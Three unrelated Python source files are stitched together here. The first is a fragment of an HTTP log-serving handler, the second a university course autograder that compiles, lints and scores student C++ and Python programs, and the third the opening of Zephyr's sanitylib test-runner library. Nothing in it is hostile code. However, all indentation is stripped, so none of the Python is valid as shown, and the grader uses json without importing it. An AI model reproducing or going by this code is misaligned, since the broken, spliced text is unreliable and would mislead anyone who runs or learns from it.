self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
try:
if pem:
server = SSLThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), pem, SSLReqHandler)
else:
server = ThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
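# Usage sketch (illustrative; the address, port and certificate file below are
# arbitrary example values, not configuration taken from this project):
#
#   start_httpd(address="127.0.0.1", port=8338, join=True)        # HTTP, blocks in serve_forever()
#   start_httpd(address="0.0.0.0", port=8338, pem="server.pem")   # HTTPS, serves from a background thread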
|
curl_grading.py
|
"""curl_grading.py: tools for analyzing and checking C++ and Py programs"""
import subprocess as sub
import difflib
import unittest
import re
import tokenize
import dis
import io
import cpplint
import sys
import pycodestyle
import logging
import os
import random
import importlib
import multiprocessing
from io import StringIO
import time
from subprocess import PIPE,Popen,run,TimeoutExpired
DEBUG = False
# 1.1 incorporate new checker from fall 2020
# 1.2 fix style point handling
# 1.3 fix Penalty, and allows argv[]
# 1.4 update compile return
# 2.0 switch to Points/MaxPoints to allow for more partial points
# 2.1 move testorder functionality in to setupClass
# 2.2 some format improvements in grade reporting
# 2.3 case sensitive check for file systems.
# 2.4 allow for no Penalty in testcase
# 2.5 improved case text handling
# 2.6 add self.authors
# 3.0 rename curl_grading.py
# 3.1 improve the bracket counting
VERSION = (3, 1)
# path = os.environ['PATH']
# if path.startswith(".:") or path.endswith(":.") or ":.:" in path:
# pass # path ok
# else:
# print("""Your path is not set correctly. The checker will not work
# unless you add "." the current working directory to your PATH.
# You can do this by editing ~/.zshrc
# """,file=sys.stderr)
# sys.exit(42)
class TimeoutException(Exception):
pass
class RunableProcessing(multiprocessing.Process):
def __init__(self, func, *args, **kwargs):
self.queue = multiprocessing.Queue(maxsize=1)
args = (func,) + args
multiprocessing.Process.__init__(self, target=self.run_func, args=args, kwargs=kwargs)
def run_func(self, func, *args, **kwargs):
try:
result = func(*args, **kwargs)
self.queue.put((True, result))
except Exception as e:
self.queue.put((False, e))
def done(self):
return self.queue.full()
def result(self):
return self.queue.get()
def timeout(seconds, force_kill=True):
def wrapper(function):
def inner(*args, **kwargs):
now = time.time()
proc = RunableProcessing(function, *args, **kwargs)
proc.start()
proc.join(seconds)
if proc.is_alive():
if force_kill:
proc.terminate()
runtime = int(time.time() - now)
raise TimeoutException('timed out after {0} seconds'.format(runtime))
assert proc.done()
success, result = proc.result()
if success:
return result
else:
raise result
return inner
return wrapper
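# Usage sketch (illustrative only, not part of the grader): the decorator runs
# the wrapped callable in a separate process and raises TimeoutException if it
# does not finish in time, e.g.
#
#   @timeout(2)
#   def run_student_solution(n):      # hypothetical helper name
#       return sum(range(n))
#
#   run_student_solution(10)          # -> 45
#   # a call that loops forever raises TimeoutException after about 2 seconds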
STDLINT = ['-readability/alt_tokens',"+build/include_alpha"]
ignore_lint = [x[1:] for x in STDLINT if x.startswith('-')]
ASTYLE_OPTIONS = [
'--style=google', '--indent=spaces=2', '--formatted', '--dry-run'
]
COMMENT_STRING = {'py': '#', 'sh': "#", 'cpp': '//'}
#CPP_CODE_ONLY = [
# 'g++', '-std=c++14', '-P', '-x', 'c++', '-dD', '-E', '-fpreprocessed'
#]
def silent_import(fname, q):
s = StringIO()
sys.stdout = s
themod = None
try:
themod = importlib.import_module(fname)
except Exception as e:
q.put("fail")
return
q.put("success")
def my_import(modname, code):
filename = modname+".py"
with open(filename,'w') as f:
f.write(code)
q = multiprocessing.Queue()
T = multiprocessing.Process(target=silent_import,args=(modname, q))
T.start()
try:
result = q.get(True,1)
except Exception as e:
T.terminate()
T.join(0.1)
return False
if result=="success":
return importlib.import_module(modname)
return False
def safe_remove(filename):
try:
os.remove(filename)
except Exception as e:
print(e)
def numbers_only(word_lines):
rr=[]
for v in word_lines:
g=v.split()
nums=[]
for x in g:
try:
nums.append(int(x))
except:
try:
nums.append(float(x))
except:
pass
rr.append(nums)
return rr
bracket_msg="""It is recommended to avoid the use of brackets in C++, i.e., these [ ] or these <: :>
a) Use .at() or other methods instead
b) replace c-style arrays with vectors or strings etc
c) if you must use a c-style array (e.g. argv) use pointers
You have {} brackets.
"""
report_msg="""
===============================
Checking {course} {prog}.
{version}
================================
Information
-----------
{info}
Passed Tests
------------
{passed}
Failed Tests
------------
{failed}
Grading
-------
{grade}"""
AUTHWARN = "WARNING, NO VALID AUTHOR LINES FOUND"
def setup_py(cls, prefix):
with open(cls.realfilename) as f:
cls.file_contents=f.read()
cls.module_name = prefix+str(random.randint(1000,100000))
cls.module_tested = my_import(cls.module_name, cls.file_contents)
if not cls.module_tested:
safe_remove(cls.module_name+".py")
raise unittest.SkipTest(f'During test of {cls.__doc__}, unable to import your module. Timeout or error')
def compile_main(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_main, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
cls.executable = None
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
return T.stderr
def compile_separate(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_separate, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.realfilename,cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
def compile(self,prefix):
if not hasattr(self,'lintoptions'):
self.lintoptions = STDLINT
try:
with open(self.realfilename) as f:
self.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile, {self.realfilename} not found.")
self.executable = prefix+str(random.randint(1000,100000))
new_source_file = self.executable + ".cpp"
with open(new_source_file,'w') as f:
f.write(self.file_contents)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',new_source_file,"-o",self.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(new_source_file)
self.code_metrics = code_analysis_cpp(self.realfilename,self.lintoptions)
return (T.returncode,T.stderr)
def compile_and_run(self,prefix):
compile(self,prefix)
try:
T = sub.run([self.executable],stdout=sub.PIPE,stderr=sub.PIPE,timeout=1,universal_newlines=True)
except Exception as e:
safe_remove(self.executable)
raise unittest.SkipTest("Failed to run.\n"+str(e))
self.output = T.stdout
self.errors = T.stderr
def bracket_check(self):
"brackets. check for brackets"
bracket_count = self.code_metrics['brackets']
if bracket_count:
self.fail(bracket_msg.format(bracket_count))
def test_includes(self):
"libraries. check the included libraries are allowed"
includes = get_includes(self.file_contents)
self.msgs.append('included libraries : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid includes: {}'.format(" ".join(x for x in invalid_includes)))
def test_imports(self):
"libraries. check the imported modules are allowed"
includes = get_python_imports(self.file_contents)
self.msgs.append('imported modules : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid imports: {}'.format(" ".join(x for x in invalid_includes)))
def test_libraries(self):
"libraries. check the included libraries/modules are allowed"
if self.program.endswith('cpp'):
test_includes(self)
else:
test_imports(self)
def test_authors(self):
"authors. check on authors' emails identified"
authors = get_authors(self.file_contents, progtype(self.realfilename))
self.authors = authors[:]
self.msgs.append('authors : {}\n'.format(" ".join(authors)
if authors else AUTHWARN))
if len(authors)==0:
self.fail('No authors found in your document.')
elif len(authors) > self.authorlimit:
self.fail(f'Author limit {self.authorlimit} exceeded.')
def test_pystyle(self):
"style. python code style and analysis"
proc_pycodestyle = sub.run(['pycodestyle', self.realfilename], stdout=sub.PIPE)
prob = False
if proc_pycodestyle.returncode:
prob = proc_pycodestyle.stdout.decode().rsplit(" ", 1)[-1].strip()
self.msgs.append("pycodestyle check: {}\n".format("{} problems".format(
len(proc_pycodestyle.stdout.decode().splitlines())) if prob else "ok"))
proc_pylint = sub.run(
['pylint', self.realfilename], stdout=sub.PIPE,stderr=sub.PIPE)
pylint_report = proc_pylint.stdout.decode().splitlines()
if len(pylint_report)<2:
logging.error('bad pylint_report'+proc_pylint.stdout.decode())
pylint_score = 0
elif "previous" in pylint_report[-2]:
pylint_score=pylint_report[-2].split()[6]
else:
pylint_score = pylint_report[-2].split()[-1]
self.msgs.append("pylint score : {}\n".format(pylint_score))
code_metrics = code_analysis_py(self.file_contents)
self.msgs.append(code_size_report(code_metrics, self.refcode))
comments = 0
for line in self.file_contents.splitlines():
if '#' in line:
comments += 1
self.msgs.append("comments : {}\n".format(comments))
def test_cppstyle(self):
"style. C++ code style and analysis"
comments = 0
for line in self.file_contents.splitlines():
if '//' in line:
comments += 1
cm = self.code_metrics
if cm['errors']:
numerrors=sum(len(x) for x in cm['errors'].values())
self.msgs.append(f"cpplint : {numerrors} problems")
cpplint_call_list = [
'cpplint', '--filter=' + ','.join(self.lintoptions), self.__doc__
]
self.msgs.append(' [using {}]\n\n'.format(' '.join(cpplint_call_list)))
for e in cm['errors']:
for x in cm['errors'][e]:
self.msgs.append(' line {} ({}): {}'.format(*x))
else:
self.msgs.append("cpplint : ok")
self.msgs.append(f"astyle : {cm['astyle']:.1%} code unchanged.")
self.msgs.append(code_size_report(cm, self.refcode))
self.msgs.append(f"comments : {comments}")
stylegrade(self)
def stylegrade(cls):
cls.stylemax=cls.Points['style']
try:
D = cls.code_metrics['errors']
except Exception as e:
cls.fail(cls,f'Something went wrong: {e}')
cpplint_count= sum(len(D[x]) for x in D)
as_grade = 5*cls.code_metrics['astyle']
cls.msgs.append(f"astyle[max 5] {as_grade:.2f}")
lint_grade = max(0, 5-cpplint_count)
cls.msgs.append(f"cpplint[max 5] {lint_grade} (1 point deduction for each problem)")
cls.Points['style'] = round(as_grade + lint_grade,2)
cls.msgs.append(f"overall style grade[max 10] {cls.Points['style']:.2f}")
def test_style(self):
"style. test program style"
if self.program.endswith('cpp'):
test_cppstyle(self)
elif self.program.endswith('py'):
test_pystyle(self)
else:
self.msgs.append(f"Don't know how to check style of {self.program}")
def read_file(filename):
"read the contents of filename into string"
filehand = open(filename)
contents = filehand.read()
filehand.close()
return contents
def read_file_for_cpplint(filename):
"read the contents of filename into list of strings"
filehand = open(filename)
contents = filehand.read()
filehand.close()
lines = contents.splitlines()
if contents.endswith('\n'):
lines.append('')
return lines
def make_grades(gradesummary,cls,special_str="",spec_grade=0):
grade = 0
grade_report = special_str
grade_report += "\n"
for test in sorted(cls.Points):
if cls.Points[test]==int(cls.Points[test]):
grade_report += f" {test}({cls.Points[test]} / {cls.MaxPoints[test]})\n"
else:
grade_report += f" {test}({cls.Points[test]:.2f} / {cls.MaxPoints[test]})\n"
grade += cls.Points[test]
grade_report += "\n"
if hasattr(cls,"Penalty"):
for test in cls.Penalty:
if test in gradesummary['fail']:
grade_report += "Penalty for failed test {}: {}\n".format(test,cls.Penalty[test])
grade -= cls.Penalty[test]
grade = max(grade+spec_grade,0)
grade_report += f"\nGrade: {grade:5.2f}"
return grade, grade_report
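# Illustrative example with hypothetical values (not part of the original):
# given a test class where
#   cls.Points    = {'correctness': 18, 'style': 9.5}
#   cls.MaxPoints = {'correctness': 20, 'style': 10}
# and no Penalty attribute, make_grades(gradesummary, cls) returns the grade
# 27.5 together with a report containing the lines
#   " correctness(18 / 20)" and " style(9.50 / 10)"
# and ending with "Grade: 27.50".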
def code_analysis_cpp(program_filename,lintoptions):
ignore_lint = [x[1:] for x in lintoptions if x.startswith('-')]
Errors = {}
def error_fcn(filename,line_number,lint_type,level,message):
category,subcategory = lint_type.split('/')
if category not in Errors:
Errors[category]=[]
Errors[category].append( (line_number,lint_type,message) )
lines = read_file_for_cpplint(program_filename)
cpplint.RemoveMultiLineComments(program_filename,lines,error_fcn)
clean_lines = cpplint.CleansedLines(lines)
cpplint.ProcessFileData(program_filename,'cpp',lines,error_fcn)
the_lines = [x for x in clean_lines.lines if x]
num_lines=len(the_lines)
num_words = sum(len(x.split()) for x in the_lines)
num_brackets = sum(x.count('[') for x in the_lines)
num_brackets += sum(x.count('<:') for x in the_lines)
num_brackets -= sum(x.count('argv[') for x in the_lines)
original = read_file(program_filename)
proc_astyle = sub.run(
['astyle', *ASTYLE_OPTIONS],
input=original.encode(),
stdout=sub.PIPE,
stderr=sub.PIPE)
if proc_astyle.returncode:
unchanged='error'
else:
original = original.splitlines()
newprog = proc_astyle.stdout.decode().splitlines()
matcher = difflib.SequenceMatcher()
matcher.set_seqs(original, newprog)
unchanged = matcher.ratio()
RealErrors={}
for e in Errors:
RealErrors[e]=[]
for x in Errors[e][:3]:
ignore=False
for s in ignore_lint:
if x[1] in s:
ignore = True
if not ignore:
RealErrors[e].append(x)
if not RealErrors[e]:
del RealErrors[e]
return {'brackets':num_brackets,
'lines': num_lines,
'words': num_words,
'errors':RealErrors,
'astyle':unchanged}
def isstring(x):
x=x.strip()
if not x:
return True
elif x.startswith('#'):
return True
elif x.startswith('"""') and x.endswith('"""'):
return True
elif x.startswith("'''") and x.endswith("'''"):
return True
elif x.startswith('"') and x.endswith('"'):
return True
elif x.startswith("'") and x.endswith("'"):
return True
def code_analysis_py(program_contents):
"count lines and words in python"
# remove docstrings
for search_str in ('\"\"\"[^\"]*\"\"\"',"\'\'\'[^\']*\'\'\'"):
for x in re.findall(search_str,program_contents,flags=re.MULTILINE|re.DOTALL):
program_contents = program_contents.replace(x,'')
srclines=program_contents.splitlines()
# remove single line strings.
srclines = [x for x in program_contents.splitlines() if not isstring(x)]
src ="\n".join(srclines)
#print(src)
return {'lines': len(src.splitlines()), 'words': len(src.split())}
pylint_options=["--enable=all","--reports=yes","--persistent=no",
"--msg-template='{category:10s}:{line:3d},{column:2d}: {msg} ({symbol})'"]
def pylint_check(program_name):
process = sub.run(['pylint',program_name,*pylint_options],
stdout=sub.PIPE,universal_newlines=True)
out_str = process.stdout
for scoreline in out_str.splitlines()[-4:]:
try:
score = float(re.search(r'Your code has been rated at ([\d.]*)/10', scoreline).groups()[0])
return score, out_str
except:
pass
raise ValueError('could not get your pylint score')
def pycodestyle_check(filename):
"run pycodestyle, return #errors and error string"
pycodestyle_res = io.StringIO()
sys.stdout = pycodestyle_res
pycodestyle_errors = pycodestyle.Checker(filename).check_all()
sys.stdout = sys.__stdout__
res = pycodestyle_res.getvalue()
return pycodestyle_errors,res
def progtype(program):
"which type, cpp or py"
try:
_, program_type = program.split('.')
except:
return "sh"
return program_type
def get_includes(file_contents):
"get included libraries in C/C++"
includes = set()
for line in file_contents.lower().splitlines():
text = line.strip()
search_str = r"#include\s*<(.*)>"
matches = re.match(search_str, text)
if matches:
includes.add(matches.group(1))
matches = re.match("#include \"(.*)\"", text)
if matches:
includes.add(matches.group(1))
return includes
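# Illustrative example (not part of the original): for file_contents of
#   '#include <vector>\n#include "utils.h"\n'
# get_includes returns {'vector', 'utils.h'}; note the source is lower-cased
# before matching, so header names are reported in lower case.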
def get_python_imports(file_contents):
"get the imports of file_contents as a set"
try:
instructions = dis.get_instructions(file_contents)
imports = [__ for __ in instructions if 'IMPORT' in __.opname]
except:
return {'ERROR PROCESSING PYTHON SCRIPT'}
grouped = set()
for instr in imports:
if instr.opname == "IMPORT_NAME":
grouped.add(instr.argval)
return grouped
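# Illustrative example (not part of the original): dis.get_instructions()
# compiles the source and exposes IMPORT_NAME opcodes, so
#   get_python_imports("import os\nfrom sys import path\n")
# returns {'os', 'sys'}; a script that fails to compile yields the error set
# {'ERROR PROCESSING PYTHON SCRIPT'} instead.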
def get_authors(file_contents, ptype,buedu=True):
"""get the authors in file_contents"""
authors = []
if ptype == 'json':
A = json.loads(file_contents)
return A.get('authors',[])
for line in file_contents.lower().splitlines():
if line.startswith(COMMENT_STRING[ptype]) and "copyright" in line:
try:
_, email = line.strip().rsplit(" ", 1)
if email.endswith('@bu.edu'):
authors.append(email if buedu else email.split("@")[0])
elif email.endswith('\r'):
authors.append('DONT_USE_WINDOWS_ENDLINES')
except:
pass
return authors
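# Illustrative example (not part of the original): for a Python submission whose
# contents include the line
#   # Copyright 2024 jdoe@bu.edu
# get_authors(contents, 'py') returns ['jdoe@bu.edu'], because the lower-cased
# line starts with the '#' comment string, contains "copyright", and its last
# whitespace-separated token ends with '@bu.edu'.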
def check_program(testclass,course=None,email=None,versioninfo=None,theprog=None):
"""return any errors as a list of strings"""
errors = []
passed = []
gradesummary = {'pass': [], 'fail': []}
testclass.realfilename = theprog
if hasattr(testclass, "setUpClass"):
try:
testclass.setUpClass()
except Exception as e:
return f"{testclass} setup fail {e}",0
loader = unittest.loader.TestLoader()
tests = loader.loadTestsFromTestCase(testclass)
def f(test,order):
testname=test.shortDescription().split('.')[0]
i = order.index(testname)
return i
if hasattr(testclass,"testorder"):
alltests = sorted(tests,key=lambda x: f(x,testclass.testorder))
else:
alltests = sorted(tests, key=lambda x: x.shortDescription())
for test in alltests:
#if testclass.program.endswith('py') and test.shortDescription().startswith('bracket'):
# continue
if DEBUG: print('running test:' ,test.shortDescription())
run = test.run()
if run.wasSuccessful():
thetest = test.shortDescription().split('.')[0]
if thetest != 'style':
passed.append('{}\n'.format(test.shortDescription()))
gradesummary['pass'].append(test.shortDescription().split('.')[0])
else:
err = f'\n{test.shortDescription()}\n'
for testmsg, res in run.failures + run.errors:
casetext = re.search(r".*CASE=(.*)\)", str(testmsg))
if casetext:
err += "\nCASE: {}\n".format(casetext.group(1)[1:-1])
if 'AssertionError:' in res:
_, msg = res.split('AssertionError: ')
else:
msg = res
err += msg
errors.append(err)
gradesummary['fail'].append(test.shortDescription().split('.')[0])
if hasattr(testclass, "tearDownClass"):
testclass.tearDownClass()
if 'style' in testclass.Points:
if testclass.stylemax != testclass.Points['style']:
errors.append('style errors')
else:
gradesummary['pass'].append('style')
grade, grade_report = make_grades(gradesummary,testclass)
msg = report_msg.format(info="\n".join(testclass.msgs),
passed=''.join(passed) if passed else "None",
failed=''.join(errors) if errors else "None",
grade = grade_report,
prog = testclass.__doc__,
version = versioninfo or "",
email =email or "",
course=course)
return msg, grade
EMPTYGRADE = {'pass': [], 'fail': []}
def errors_msg(errors):
"format error message"
msg = '-----------------errors found--------------\n'
for testmsg in errors:
msg += testmsg + "\n-------\n"
return msg
SIZE_REPORT_TEMPLATE = """lines of code : {}, {:4.0%} of reference
tokens in code : {}, {:4.0%} of reference
"""
def code_size_report(submitted_code, reference_code):
"generate message about code size"
return SIZE_REPORT_TEMPLATE.format(
submitted_code['lines'],
submitted_code['lines'] / reference_code['lines'],
submitted_code['words'],
submitted_code['words'] / reference_code['words'])
def pyshell(Parms,q):
summary, results, gradesummary = overallpy(**Parms)
q.put([summary,results,gradesummary])
def check_program_shell(Parms,q):
q.put(check_program(**Parms))
def case_sensitive():
"is the file system case sensitive?"
fname = f"testing_{random.randint(1_000_000,2_000_000)}"
os.mkdir(fname)
try:
os.mkdir(fname.upper())
os.rmdir(fname.upper())
except:
return False
finally:
os.rmdir(fname)
return True
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
